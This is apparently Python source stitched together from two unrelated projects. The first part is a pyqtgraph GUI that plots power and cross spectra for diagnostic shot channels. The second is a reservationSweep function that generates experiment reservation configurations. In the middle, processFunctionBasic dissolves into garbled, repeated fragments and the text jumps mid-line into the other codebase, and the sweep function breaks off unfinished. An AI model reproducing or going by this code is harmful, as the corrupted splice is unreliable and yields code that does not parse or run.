[dataParam[dataParam.index==i] for i in range(len(dataParam))]\r\n pTypeList = [self.pTypePsdKey,self.pTypeBasicKey]\r\n\r\n for i in range(2):\r\n for dataParam in dataParamList:\r\n dindex = self.addNewDataItem(windex,pindexes[i][0],pTypeList[i], dataParam,processParam)\r\n self.updateXAxis(self.ps[windex][pindexes[i][0]].getAxis('bottom'))\r\n self.updateYAxis(self.ps[windex][pindexes[i][0]].getAxis('left'))\r\n\r\n xRegion = pg.LinearRegionItem()\r\n xRegion.xRegionSlot = None\r\n xRegion.setZValue(10)\r\n xRegion.sigRegionChanged.connect(lambda: self.updateXRegion(windex,pindexes[0][0],xRegion,**self.keys))\r\n self.ps[windex][pindexes[1][0]].addItem(xRegion,ignoreBounds=True)\r\n self.ps[windex][pindexes[0][0]].setAutoVisible(y=True)\r\n self.ps[windex][pindexes[1][0]].setAutoVisible(y=True)\r\n xRegion.setRegion([0.018,0.020])\r\n #xRegion.setRegion([0.018, 0.020])\r\n windowLayoutItem.lstWindow.item(windex).setSelected(True)\r\n windowLayoutItem.updatePlotLayouts()\r\n if self.selectPlot:\r\n windowLayoutItem.tblPlot1.item(self.tempSelectedRow,self.tempSelectedColumn).setSelected(True)\r\n\r\n\r\n def plotCsd(self,shotChannelItem, windowLayoutItem,actionItem):\r\n self.times = []\r\n\r\n nPlotRow,nPlotColumn = 4,1\r\n windex,pindexes,dataParam,processParam = self.getInitialInfo(shotChannelItem, windowLayoutItem,actionItem,nPlotRow=nPlotRow,nPlotColumn=nPlotColumn)\r\n if windex == None:\r\n return\r\n\r\n #prepare dataParams\r\n pTypeList = [self.pTypeCsdKey,self.pTypeCohKey,self.pTypePhaseKey,self.pTypeBasicKey]\r\n paramList = [dataParam[dataParam.index==i] for i in range(len(dataParam))]\r\n\r\n self.addNewDataItem(windex,pindexes[0][0],pTypeList[0], dataParam,processParam)\r\n yAx,xAx = self.ps[windex][pindexes[0][0]].getAxis('left'),self.ps[windex][pindexes[0][0]].getAxis('bottom')\r\n self.updateYAxis(yAx)\r\n self.updateXAxis(xAx)\r\n #self.ps[windex][pindexes[0][0]].legend.hide()\r\n xAx.setStyle(tickLength = -self.tickLength, showValues=False)\r\n xAx.showLabel(False)\r\n xAx.setMaximumHeight(0)\r\n\r\n self.addNewDataItem(windex,pindexes[1][0],pTypeList[1], dataParam,processParam)\r\n yAx,xAx = self.ps[windex][pindexes[1][0]].getAxis('left'),self.ps[windex][pindexes[1][0]].getAxis('bottom')\r\n self.ps[windex][pindexes[1][0]].legend.hide()\r\n self.updateYAxis(yAx)\r\n self.updateXAxis(xAx)\r\n xAx.setStyle(tickLength = -self.tickLength, showValues=False)\r\n xAx.showLabel(False)\r\n xAx.setMaximumHeight(0)\r\n\r\n self.addNewDataItem(windex,pindexes[2][0],pTypeList[2], dataParam,processParam)\r\n self.updateYAxis(self.ps[windex][pindexes[2][0]].getAxis('left'))\r\n self.updateXAxis(self.ps[windex][pindexes[2][0]].getAxis('bottom'))\r\n self.ps[windex][pindexes[2][0]].legend.hide()\r\n self.ps[windex][pindexes[2][0]].getAxis('bottom').setStyle(tickLength = -self.tickLength)\r\n\r\n self.ps[windex][pindexes[0][0]].setXLink(self.ps[windex][pindexes[2][0]])\r\n self.ps[windex][pindexes[1][0]].setXLink(self.ps[windex][pindexes[2][0]])\r\n #self.ps[windex][pindexes[2][0]].vb.sigResized.connect(functools.partial(self.linkMaxHeight,self.ps[windex][pindexes[2][0]].vb,[self.ps[windex][pindexes[1][0]],self.ps[windex][pindexes[0][0]]]))\r\n #self.ps[windex][pindexes[2][0]].vb.sigResized.connect(functools.partial(self.TESTPRINT,self.ps[windex][pindexes[2][0]]))\r\n 
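plotPsd above wires a pg.LinearRegionItem on the raw trace to re-run the spectral estimate whenever the selection moves. A self-contained sketch of that linkage, assuming pyqtgraph >= 0.12, NumPy and SciPy are installed; every name here is illustrative rather than taken from frmMain:

```python
# Self-contained sketch: a LinearRegionItem on a time trace drives a Welch PSD
# of the selected window, mirroring the region-to-spectrum linkage wired above.
import numpy as np
import pyqtgraph as pg
from scipy.signal import welch

app = pg.mkQApp("region-psd demo")
win = pg.GraphicsLayoutWidget(show=True)
p_psd = win.addPlot(row=0, col=0)             # spectrum of the selected region
p_time = win.addPlot(row=1, col=0)            # raw trace with the region selector

t = np.linspace(0.0, 0.05, 5000)              # 100 kHz sampling, 50 ms trace
y = np.sin(2 * np.pi * 5e3 * t) + 0.3 * np.random.randn(t.size)
p_time.plot(t, y)

region = pg.LinearRegionItem([0.018, 0.020])  # same default window as plotPsd
region.setZValue(10)
p_time.addItem(region, ignoreBounds=True)
psd_curve = p_psd.plot()

def update_psd():
    lo, hi = region.getRegion()
    mask = (t > lo) & (t < hi)                # the mask pattern the process functions use
    if mask.sum() > 16:
        f, pxx = welch(y[mask], fs=1.0 / (t[1] - t[0]),
                       nperseg=min(512, int(mask.sum())))
        psd_curve.setData(f, pxx)

region.sigRegionChanged.connect(update_psd)
update_psd()

if __name__ == '__main__':
    pg.exec()
```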
#self.ws[windex].sigDeviceRangeChanged.connect(functools.partial(self.linkMaxHeight,windex,[self.ps[windex][pindexes[0][0]],self.ps[windex][pindexes[1][0]],self.ps[windex][pindexes[2][0]],self.ps[windex][pindexes[3][0]]]))\r\n\r\n for i in range(2):\r\n dindex = self.addNewDataItem(windex,pindexes[3][0],pTypeList[3], paramList[i],processParam)\r\n #self.updateXAxis(self.ps[windex][pindexes[i][0]].getAxis('bottom'))\r\n self.updateYAxis(self.ps[windex][pindexes[3][0]].getAxis('left'))\r\n self.updateXAxis(self.ps[windex][pindexes[3][0]].getAxis('bottom'))\r\n\r\n #self.ps[windex][pindexes[0][0]].getAxis('bottom').label.hide()\r\n #self.ws[windex].sigDeviceRangeChanged.connect(functools.partial(self.linkMaxHeight,windex,[pindexes[0][0],pindexes[1][0],pindexes[2][0],pindexes[3][0]]))\r\n self.ws[windex].sigDeviceRangeChanged.connect(functools.partial(self.linkMaxHeight,windex,[pindexes[0][0],pindexes[1][0],pindexes[2][0],pindexes[3][0]]))\r\n xRegion = pg.LinearRegionItem()\r\n xRegion.xRegionSlot = None\r\n xRegion.setZValue(10)\r\n xRegion.sigRegionChanged.connect(lambda: self.updateXRegion(windex,pindexes[0][0],xRegion,**self.keys))\r\n xRegion.sigRegionChanged.connect(lambda: self.updateXRegion(windex,pindexes[1][0],xRegion,**self.keys))\r\n xRegion.sigRegionChanged.connect(lambda: self.updateXRegion(windex,pindexes[2][0],xRegion,**self.keys))\r\n self.ps[windex][pindexes[3][0]].addItem(xRegion,ignoreBounds=True)\r\n self.ps[windex][pindexes[0][0]].setAutoVisible(y=True)\r\n self.ps[windex][pindexes[1][0]].setAutoVisible(y=True)\r\n self.ps[windex][pindexes[2][0]].setAutoVisible(y=True)\r\n xRegion.setRegion([0.018,0.020])\r\n #xRegion.setRegion([0.018, 0.020])\r\n windowLayoutItem.lstWindow.item(windex).setSelected(True)\r\n\r\n windowLayoutItem.updatePlotLayouts()\r\n if self.selectPlot:\r\n windowLayoutItem.tblPlot1.item(self.tempSelectedRow,self.tempSelectedColumn).setSelected(True)\r\n\r\n\r\n def TESTPRINT(self,view):\r\n print (view.height())\r\n\r\n\r\n def linkMaxHeight(self,windex,pindexes):\r\n ##START HERE\r\n p=pg.PlotItem()\r\n w = self.ws[windex]\r\n items,locs = [x for x in w.ci.items.keys()],[x for x in w.ci.items.values()]\r\n\r\n ps= [items[i] for i in range(len(items)) if type(items[i])==type(p)]\r\n\r\n plocs=[locs[i] for i in range(len(items)) if type(items[i])==type(p)]\r\n\r\n rows,columns = [],[]\r\n\r\n for ploc in plocs:\r\n rows+=[x[0] for x in ploc]\r\n columns+=[x[1] for x in ploc]\r\n rows,columns = np.unique(rows), np.unique(columns)\r\n pUnitHeight = (w.height()-self.wHeightOffset-self.wHeightInc*len(rows))/len(rows)\r\n pUnitWidth = (w.width()-self.wWidthOffset-self.wWidthInc*len(columns))/len(columns)\r\n\r\n for column in columns:\r\n indexes = [i for i in range(len(ps)) if column in [x[1] for x in plocs[i]]]\r\n rowSpans = [len([x for x in plocs[i] if column==x[1]]) for i in indexes]\r\n totalRows = np.sum(rowSpans)\r\n availHeight = pUnitHeight*totalRows\r\n for i in indexes:\r\n p=ps[i]\r\n cItems = p.childItems()\r\n availHeight -= cItems[0].height()+cItems[1].height()+self.pHeightOffset\r\n vUnitHeight = availHeight/totalRows\r\n\r\n for i in range(len(indexes)):\r\n p=ps[indexes[i]]\r\n cItems = p.childItems()\r\n p.setMaximumHeight(vUnitHeight*rowSpans[i]+cItems[0].height()+cItems[1].height()+self.pHeightOffset)\r\n p.setMinimumHeight(vUnitHeight*rowSpans[i]+cItems[0].height()+cItems[1].height()+self.pHeightOffset)\r\n\r\n for row in rows:\r\n indexes = [i for i in range(len(ps)) if row in [x[0] for x in plocs[i]]]\r\n columnSpans = [len([x for x 
in plocs[i] if row==x[0]]) for i in indexes]\r\n totalColumns = np.sum(columnSpans)\r\n availWidth = pUnitWidth*totalColumns\r\n for i in indexes:\r\n p=ps[i]\r\n cItems = p.childItems()\r\n availWidth -= cItems[2].width()+cItems[3].width()+self.pWidthOffset\r\n vUnitWidth = availWidth/totalColumns\r\n\r\n for i in range(len(indexes)):\r\n p=ps[indexes[i]]\r\n cItems = p.childItems()\r\n p.setMaximumWidth(vUnitWidth*columnSpans[i]+cItems[2].width()+cItems[3].width()+self.pWidthOffset)\r\n p.setMinimumWidth(vUnitWidth*columnSpans[i]+cItems[2].width()+cItems[3].width()+self.pWidthOffset)\r\n\r\n \"\"\"\r\n plots = [self.ps[windex][i] for i in pindexes]\r\n totalHeight = 0\r\n\r\n #self.ws[windex].updateScene()\r\n for p in plots:\r\n totalHeight+=p.height()\r\n print self.ws[windex].geometry().height()-totalHeight\r\n\r\n\r\n print self.ws[windex].geometry()\r\n\r\n plots = [self.ps[windex][i] for i in pindexes]\r\n\r\n for p in plots:\r\n p.setMaximumHeight(12000)\r\n self.ws[windex].ci._updateView()\r\n\r\n totalHeight = 0\r\n\r\n #self.ws[windex].updateScene()\r\n for p in plots:\r\n totalHeight+=p.vb.height()\r\n #print v.height()\r\n height = totalHeight/(len(plots)+0.0)\r\n\r\n\r\n for p in plots:\r\n #p.setMaximumHeight(p.height()+height-p.vb.height())\r\n p.setMinimumHeight(p.height()+height-p.vb.height())\r\n \"\"\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n def getProcessParam(self):\r\n # get parameters\r\n\r\n\r\n nperseg = self.cmbNperseg.currentText()\r\n if nperseg =='-':\r\n nperseg = 512\r\n elif not nperseg.isdigit():\r\n nperseg = 512\r\n else:\r\n nperseg = int (nperseg)\r\n\r\n overlap = self.sbxOverlap.text()\r\n if overlap =='':\r\n overlap = 50\r\n elif not overlap.isdigit():\r\n overlap = 50\r\n else:\r\n overlap = int(overlap)\r\n processParams = {self.isSmoothKey:self.cbxSmooth.isChecked(),\r\n self.nSmoothKey: self.ledNSmooth.text(),\r\n self.isDcCancelHeadKey: self.rbtDcCancelHead.isChecked(),\r\n self.nDcCancelHeadKey: self.ledNDcCancelHead.text(),\r\n self.isDcCancelTailKey: self.rbtDcCancelTail.isChecked(),\r\n self.nDcCancelTailKey: self.ledNDcCancelTail.text(),\r\n self.npersegKey:nperseg,\r\n self.isUncalibratedSignalKey:self.cbxUncalibratedSignal.isChecked(),\r\n self.isNormalizePsdKey:self.cbxNormalizePsd.isChecked(),\r\n self.overlapKey:overlap\r\n }\r\n return processParams\r\n\r\n def getParams(self,shotChannelItem):\r\n\r\n param = self.params[self.params[self.channelIdKey].isin(shotChannelItem.selectedChannelIDs)].reset_index(drop=True)\r\n return param\r\n\r\n def getData (self,param):\r\n\r\n data = pd.DataFrame()\r\n for shotNum in list (param[self.shotNumKey].unique()):\r\n dataIndex = [x for x in range(len(self.dataList)) if self.dataList[x][self.shotNumKey]==str(shotNum)][0]\r\n tempData = self.dataList[dataIndex][self.dfKey]\r\n tempParam = param[param[self.shotNumKey]==shotNum].reset_index(drop=True)\r\n channels = list(tempParam[self.channelDescriptionKey].unique())\r\n channelMask = np.zeros(len(tempData.columns)).astype(bool)\r\n for channelName in channels:\r\n para = tempParam[tempParam[self.channelDescriptionKey]==channelName].reset_index(drop=True)\r\n channelId = para[self.channelIdKey][0]\r\n channelMask = channelMask | (tempData.columns==channelId)\r\n tempData = tempData[tempData.columns[channelMask]]\r\n data= pd.concat([data, tempData], axis=1).reset_index(drop=True)\r\n null = pd.isnull(data).any(1).nonzero()[0]\r\n if len(null)>0:\r\n data = data.ix[:(null[0]-1),:]\r\n return data\r\n\r\n\r\n\r\n def activateWindow(self):\r\n if 
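The getData method above assembles the selected channels per shot and then truncates the merged frame at the first row containing a NaN, using pandas APIs that have since been removed (`DataFrame.ix`, `Series.nonzero`). A small sketch of the same truncation with current pandas; the frame and column names are stand-ins:

```python
# The NaN-truncation step of getData, rewritten against current pandas
# (DataFrame.ix and Series.nonzero() used above were removed long ago).
import numpy as np
import pandas as pd

data = pd.DataFrame({"ch1": [1.0, 2.0, 3.0, np.nan, 5.0],
                     "ch2": [10.0, 20.0, np.nan, 40.0, 50.0]})

null = data.isnull().any(axis=1).to_numpy().nonzero()[0]
if len(null) > 0:
    data = data.iloc[:null[0]]   # keep only the rows before the first NaN
print(data)                      # rows 0 and 1 survive (first NaN is in row 2)
```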
len(self.Ui_frmWindowLayout.lstWindow.selectedIndexes())==0:\r\n return\r\n windex = self.Ui_frmWindowLayout.lstWindow.selectedIndexes()[0].row()\r\n window = self.ws[windex]\r\n window.setWindowState(window.windowState() & ~QtCore.Qt.WindowMinimized | QtCore.Qt.WindowActive)\r\n window.activateWindow()\r\n\r\n\r\n def updateAvailChannel(self):\r\n\r\n for item in [self.Ui_frmShotChannel.lstChannel.item(i) for i in range(self.Ui_frmShotChannel.lstChannel.count())]:\r\n item.setFlags(item.flags() | QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsEnabled)\r\n item.setBackgroundColor(self.listBgColor)\r\n\r\n if len(self.Ui_frmShotChannel.lstLoadedShot.selectedItems())==0:\r\n return\r\n\r\n shotNums = [x.text() for x in self.Ui_frmShotChannel.lstLoadedShot.selectedItems()]\r\n for item in [self.Ui_frmShotChannel.lstChannel.item(i) for i in range(self.Ui_frmShotChannel.lstChannel.count())]:\r\n count = 0\r\n for shotNum in shotNums:\r\n tempParam = self.params[self.params[self.shotNumKey]==int(shotNum)]\r\n if item.text() in list(tempParam[self.channelDescriptionKey]):\r\n count +=1\r\n\r\n if count == 0: #if the channel cannot be found in any shots selected\r\n item.setFlags(item.flags() & ~QtCore.Qt.ItemIsSelectable & ~QtCore.Qt.ItemIsEnabled)\r\n elif count < len(shotNums):#only some but not all the shots selected have the channel\r\n item.setBackgroundColor(self.listIncompleteMatchBgColor)\r\n\r\n\r\n def updateAvailShot (self):\r\n for item in [self.Ui_frmShotChannel.lstLoadedShot.item(i) for i in range(self.Ui_frmShotChannel.lstLoadedShot.count())]:\r\n item.setFlags(item.flags() | QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsEnabled)\r\n item.setBackgroundColor(self.listBgColor)\r\n\r\n if len(self.Ui_frmShotChannel.lstChannel.selectedItems())==0:\r\n return\r\n\r\n channels = [x.text() for x in self.Ui_frmShotChannel.lstChannel.selectedItems()]\r\n for item in [self.Ui_frmShotChannel.lstLoadedShot.item(i) for i in range(self.Ui_frmShotChannel.lstLoadedShot.count())]:\r\n count = 0\r\n for channel in channels:\r\n tempParam = self.params[self.params[self.channelDescriptionKey]==channel]\r\n if int(item.text()) in list(tempParam[self.shotNumKey]):\r\n count +=1\r\n\r\n if count == 0: #if the shot has none of the channels selected\r\n item.setFlags(item.flags() & ~QtCore.Qt.ItemIsSelectable & ~QtCore.Qt.ItemIsEnabled)\r\n elif count < len(channels):#the shot has only some but not all of the channels selected\r\n item.setBackgroundColor(self.listIncompleteMatchBgColor)\r\n\r\n def selectPlotLayout(self,windex=None, pindexes=[]):\r\n if windex==None or not pindexes:\r\n return\r\n locations = [self.ps[windex][i].location for i in pindexes]\r\n for location in locations:\r\n row, column = location[:2]\r\n self.Ui_frmWindowLayout.tblPlot1.item(row,column).setSelected(True)\r\n\r\n\r\n def getPlotItemLocation(self,windex=None,pNumber=None):\r\n if windex==None or pNumber ==None:\r\n return None,None\r\n gl = self.Ui_frmWindowLayout.windowListboxItem.itemList[windex].ci\r\n items = list(gl.items.keys())\r\n pindexes = [i for i in range(len(items)) if type(items[i])==type(PlotItem1D())]\r\n locations = list(gl.items.values())\r\n for pindex in pindexes:\r\n if items[pindex].number == pNumber:\r\n return items[pindex],locations[pindex]\r\n return None,None\r\n\r\n def getStartingLocation (self,windowLayoutItem):\r\n self.selectPlot = False #select the plot in the layout after plotting\r\n\r\n # return if # of cells have conflict with occupied cells (not for basic plot)\r\n if not 
windowLayoutItem.lstWindow.selectedItems():\r\n windex = self.openNewWindow()\r\n\r\n else:\r\n windex = windowLayoutItem.lstWindow.selectedIndexes()[0].row()\r\n\r\n if not windowLayoutItem.tblPlot1.selectedItems():\r\n # find the lowest column and highest to row to start\r\n # check for interference\r\n row,column = self.findAvailableLocation(windex)\r\n location = (row,column,1,1)\r\n else:\r\n location = locationToPlot(windowLayoutItem.tblPlot1)\r\n self.selectPlot=True\r\n self.tempSelectedRow,self.tempSelectedColumn = windowLayoutItem.tblPlot1.selectedItems()[0].row(),windowLayoutItem.tblPlot1.selectedItems()[0].column()\r\n return windex,location\r\n\r\n\r\n def findAvailableLocation (self,windex):\r\n if len(self.ps[windex])==0:\r\n return 0,0\r\n\r\n locations = [x.location for x in self.ps[windex]]\r\n minColumn = np.min([x[1] for x in locations])\r\n pLocs = [x for x in locations if x[1]==minColumn]\r\n maxRow = np.max([x[0] for x in pLocs])\r\n lastLoc = [x for x in pLocs if x[0] == maxRow][0]\r\n row,column = lastLoc[0]+lastLoc[2],lastLoc[1]\r\n return row,column\r\n\r\n def getPindexes(self, windex=None,location=(0,0,1,1), nPlotRow=1, nPlotColumn=1):\r\n if windex ==None:\r\n return None\r\n rowSpan,columnSpan = location[2],location[3]\r\n occupiedLocations = [x.location for x in self.ps[windex]]\r\n\r\n pindexes = []\r\n\r\n planLocations = []\r\n for i in range(nPlotRow):\r\n planRow = []\r\n for j in range(nPlotColumn):\r\n planRow.append((location[0]+i*rowSpan,location[1]+j*columnSpan,rowSpan,columnSpan))\r\n planLocations.append(planRow)\r\n\r\n #check if location is on one of the plots\r\n if planLocations[0][0] in occupiedLocations:\r\n for i in range(nPlotRow):\r\n rowOfPindexes = []\r\n for j in range(nPlotColumn):\r\n if planLocations[i][j] not in occupiedLocations:\r\n return None\r\n else:\r\n rowOfPindexes.append(occupiedLocations.index(planLocations[i][j]))\r\n pindexes.append(rowOfPindexes)\r\n return pindexes\r\n\r\n else:\r\n for i in range(nPlotRow):\r\n for j in range(nPlotColumn):\r\n if planLocations[i][j] in occupiedLocations:\r\n return None\r\n\r\n for i in range(nPlotRow):\r\n rowOfPindexes = []\r\n for j in range(nPlotColumn):\r\n pindex = self.addNewPlot(windex,planLocations[i][j])\r\n rowOfPindexes.append(pindex)\r\n\r\n pindexes.append(rowOfPindexes)\r\n return pindexes\r\n\r\n def processFunctionBasic (self,pItem, *args,**kargs):\r\n\r\n para = pItem.dataParam.reset_index(drop=True).ix[0]\r\n y = np.array(pItem.rawData[para[self.channelIdKey]])\r\n\r\n\r\n #calibration and unit\r\n if pItem.processParam[self.isUncalibratedSignalKey]:\r\n yUnit = para[self.Y_Unit_LabelKey]\r\n else:\r\n y = y*float(para[self.calibrationKey])\r\n yUnit = para[self.unitKey]\r\n\r\n #smooth\r\n if pItem.processParam[self.isSmoothKey]:\r\n if pItem.processParam[self.nSmoothKey].isdigit():\r\n if 0xRegion[0])\r\n mask2 = (txRegion[0])\r\n mask2 = (txRegion[0])\r\n mask2 = (txRegion[0])\r\n mask2 = (thighestValue else highestValue\n myChanges.update({key:deepcopy(values)})\n if number_only:\n return highestValue\n else:\n return deepcopy(myChanges),deepcopy(multipliers)\n \ndef reservationSweep(SweepInput,ourInput,origInput):\n\n #first get the name of the reservation sweep applies to\n myName = SweepInput[\"name\"] if dictHasKey(SweepInput,\"name\") else False\n if myName == False:\n print(\"Error no name in reservation sweep. 
We don't know what reservation you want to sweep over.\")\n myDebug()\n sys.exit()\n #get the reservation\n resv=deepcopy(origInput[\"reservations-%s\"%myName])\n #now iterate over the reservation-array\n count = 0\n #allChanges is a gauge of how many changes are in resvTypes. Each resvType should have the same amount of changes\n allChanges = 0\n #countingChanges is the amount of changes total for this resvType\n countingChanges = 0\n allReservations = []\n for resvType in resv[\"reservations-array\"]:\n #ok we have a type apply the corresponding SweepInput\n sweeps = SweepInput[\"reservations-array\"][count]\n #changes are how many different experiments are going to result from the base sweep(non-multiplier)\n changes = determineNumChanges(sweeps)\n #myChanges are the dict of non-multiplier key:values pair where # values=changes\n #multipliers is a dict(key of multiplier #) of non-parsed dicts ( [multiplier-key][key][non-parsed value] )\n myChanges,multipliers = getMyChanges(sweeps,changes)\n \n \n #now integrate the changes with what's there\n #TODO there are conflicting keys: submit-before-start or submit\n #TODO interval or resources\n #TODO and optional keys: repeat-every\n for key in resvType.keys():\n if key == \"machines\":\n for machineKey in resvType[\"machines\"].keys():\n if machineKey in myChanges.keys():\n continue\n valueOfKey = resvType[\"machines\"][machineKey]\n values = [valueOfKey]*changes\n myChanges.update({machineKey:deepcopy(values)})\n else:\n if key in myChanges.keys():\n continue\n valueOfKey = resvType[key]\n values = [valueOfKey]*changes\n myChanges.update({key:deepcopy(values)})\n #myReservations is the list of experiments using resvType as a base and swept over\n #after this loop it holds only non-multiplier experiments\n myReservations=[]\n for i in range(0,changes,1):\n reservation = {}\n reservation[\"machines\"]={}\n machines={}\n for key in myChanges.keys():\n if key in MACHINE_KEYS:\n machines[key]=myChanges[key][i]\n else:\n reservation[key] = myChanges[key][i]\n reservation[\"machines\"]=functions.orderDict(machines,MACHINE_KEYS)\n reservation = functions.orderDict(reservation,RESERVATION_ORDER)\n myReservations.append(deepcopy(reservation))\n if len(multipliers) == 0:\n if allChanges == 0:\n allChanges = changes\n elif allChanges != changes:\n print(f\"Error! This reservation type in reservation-sweep has an unequal amount of changes than previous types.\")\n print(f\"Previous changes: {allChanges} Current changes: {changes}\")\n myDebug()\n sys.exit()\n if len(multipliers) > 0:\n #countingChanges keeps track of all the changes for this resvType ( number of experiments )\n countingChanges = changes\n #ok we have multipliers\n #first take all the keys and sort them\n aListOfKeys = list(multipliers.keys())\n aListOfKeys.sort(key=functions.natural_keys)\n #ok they are sorted, now iterate\n neg_reservations = []\n pos_reservations = []\n for multiplierKey in aListOfKeys:\n #lets iterate through all the sweep keys for this multiplier\n multiplierDict = multipliers[multiplierKey]\n #changes is # of values for this multiplierKey\n changes = determineNumChanges(multiplierDict)\n # myChanges is the key:values dict where # values = changes\n myChanges=getMyChanges(multiplierDict,changes)[0]\n #are these normal multipliers, or are they non-multiplier multipliers?\n if (multiplierKey.find(\"-\") == -1) and (multiplierKey.find(\"+\") == -1):\n #so we have the changes for a single multiplier. 
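reservationSweep above keeps every key as a list with one entry per experiment: swept keys already carry their value lists, and each un-swept key of the base reservation is broadcast with `[value]*changes` before the lists are zipped back into per-experiment dicts. The pattern in isolation, with toy data standing in for the project's key tables:

```python
# Toy version of the broadcast-then-zip pattern used throughout reservationSweep:
# swept keys already map to per-experiment value lists; every other key from the
# base dict is repeated so all lists share one length, then recombined.
from copy import deepcopy

base = {"node": 4, "walltime": 3600, "queue": "debug"}
my_changes = {"node": [4, 8, 16]}                  # the swept key
changes = len(my_changes["node"])

for key, value in base.items():
    if key not in my_changes:
        my_changes[key] = [value] * changes        # broadcast un-swept keys

experiments = [{key: deepcopy(values[i]) for key, values in my_changes.items()}
               for i in range(changes)]
for exp in experiments:
    print(exp)
```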
Make reservations out of it\n #based on each reservation we already added from non-multipliers.\n #myReservations are all the reservations(experiments) for this resvType appended\n holdingReservations = deepcopy(myReservations)\n for holdingReservation in holdingReservations:\n tmpChanges = deepcopy(myChanges)\n\n \n #tmpChanges is myChanges which is the key:values dict where # values = changes\n #go through each key in the holdingReservation. If it already exists in tmpChanges\n #then skip it, the values were already made for that key. If not, take what is in\n #the holdingReservation and multiply it by # values (changes) and add that key to tmpChanges with those values\n for key in holdingReservation.keys():\n if key == \"machines\":\n for machineKey in holdingReservation[\"machines\"].keys():\n if machineKey in myChanges.keys():\n continue\n valueOfKey = holdingReservation[\"machines\"][machineKey]\n values = [valueOfKey]*changes\n tmpChanges.update({machineKey:values})\n else:\n if key in tmpChanges.keys():\n continue\n valueOfKey = holdingReservation[key]\n values = [valueOfKey]*changes\n tmpChanges.update({key:values})\n for i in range(0,changes,1):\n reservation = {}\n reservation[\"machines\"]={}\n machines={}\n for key in tmpChanges.keys():\n if key in MACHINE_KEYS:\n machines[key] = tmpChanges[key][i]\n else:\n reservation[key] = tmpChanges[key][i]\n reservation[\"machines\"] = functions.orderDict(machines,MACHINES_ORDER)\n reservation = functions.orderDict(reservation,RESERVATION_ORDER)\n myReservations.append(deepcopy(reservation))\n \n countingChanges= countingChanges + countingChanges*changes\n #ok the multiplier key is negative. This is a set of reservations not multiplied by multipliers\n elif multiplierKey.find(\"-\") != -1:\n #populate the myChanges dict with what is already in the original reservation if not specified in this multiplier key\n for key in resvType.keys():\n if key == \"machines\":\n for machineKey in resvType[\"machines\"].keys():\n if machineKey in myChanges.keys():\n continue\n valueOfKey = resvType[\"machines\"][machineKey]\n values = [valueOfKey]*changes\n myChanges.update({machineKey:deepcopy(values)})\n else:\n if key in myChanges.keys():\n continue\n valueOfKey = resvType[key]\n values = [valueOfKey]*changes\n myChanges.update({key:deepcopy(values)})\n #ok now make reservations out of myChanges\n key_reservations=[]\n for i in range(0,changes,1):\n reservation = {}\n reservation[\"machines\"]={}\n machines={}\n for key in myChanges.keys():\n if key in MACHINE_KEYS:\n machines[key]=myChanges[key][i]\n else:\n reservation[key] = myChanges[key][i]\n reservation[\"machines\"]=functions.orderDict(machines,MACHINE_KEYS)\n reservation = functions.orderDict(reservation,RESERVATION_ORDER)\n key_reservations.append(deepcopy(reservation))\n #keep putting the reservations at the beginning (-1 will have a lower number experiment # than -5 as -5 will be processed first)\n neg_reservations=deepcopy(key_reservations) + neg_reservations\n elif multiplierKey.find(\"+\") != -1:\n #populate the myChanges dict with what is already in the original reservation if not specified in this multiplier key\n for key in resvType.keys():\n if key == \"machines\":\n for machineKey in resvType[\"machines\"].keys():\n if machineKey in myChanges.keys():\n continue\n valueOfKey = resvType[\"machines\"][machineKey]\n values = [valueOfKey]*changes\n myChanges.update({machineKey:deepcopy(values)})\n else:\n if key in myChanges.keys():\n continue\n valueOfKey = resvType[key]\n values = 
[valueOfKey]*changes\n myChanges.update({key:deepcopy(values)})\n #ok now make reservations out of myChanges\n key_reservations=[]\n for i in range(0,changes,1):\n reservation = {}\n reservation[\"machines\"]={}\n machines={}\n for key in myChanges.keys():\n if key in MACHINE_KEYS:\n machines[key]=myChanges[key][i]\n else:\n reservation[key] = myChanges[key][i]\n reservation[\"machines\"]=functions.orderDict(machines,MACHINE_KEYS)\n reservation = functions.orderDict(reservation,RESERVATION_ORDER)\n key_reservations.append(deepcopy(reservation))\n #keep putting the reservations at the end (+1 will come before +5)\n pos_reservations.extend(deepcopy(key_reservations))\n \n \n countingChanges+=len(neg_reservations)+len(pos_reservations)\n #I want to put negative reservations before the multiplied ones\n myReservations=deepcopy(neg_reservations)+myReservations+deepcopy(pos_reservations)\n # we are now done adding reservations of this type since we have gone through all the multiplier keys for this type \n if allChanges == 0:\n allChanges = countingChanges\n elif allChanges != countingChanges:\n print(f\"Error! This reservation type in reservation-sweep has an unequal amount of changes than previous types.\")\n print(f\"Previous changes: {allChanges} Current changes: {countingChanges}\")\n myDebug()\n sys.exit()\n \n #now add these new reservations to the list of allReservations. allReservations[0] will be all of the reservations of type reservations-array[0]\n # allReservations[1] will be all of the reservations of type reservations-array[1]\n allReservations.append(deepcopy(myReservations))\n #allReservations[0..] holds lists of all the experiments\n #allReservations[0][0] holds experiment_xtra1 reservation Type 1\n #allReservations[1][0] holds experiment_xtra1 reservation Type 2\n #allReservations[0][1] holds experiment_xtra2 reservation Type 1\n #...\n\n #if any list in allReservations doesn't hold the amount of changes(experiments)\n #that the others have (dictated by allChanges) then increase it by allChanges\n #this assumes (correctly) that it either holds allChanges' size list or size 1\n \n for i in range(0,len(allReservations),1):\n if len(allReservations[i]) != allChanges:\n allReservations[i]=allReservations[i] * allChanges\n \n #now put together the experiments\n allReservationsJson = []\n for i in range(0,allChanges,1):\n reservationJson = json.loads(json.dumps({}))\n reservationJson[\"reservations-array\"]=[ deepcopy(resvType[i]) for resvType in allReservations]\n allReservationsJson.append(deepcopy(reservationJson))\n\n \n #we can start adding the reservations to what is already there\n \n currentExperiments = len(ourInput.keys())\n #if there were no sweeps before\n # really this is a formality, there should better be sweeps before (like nodes!) 
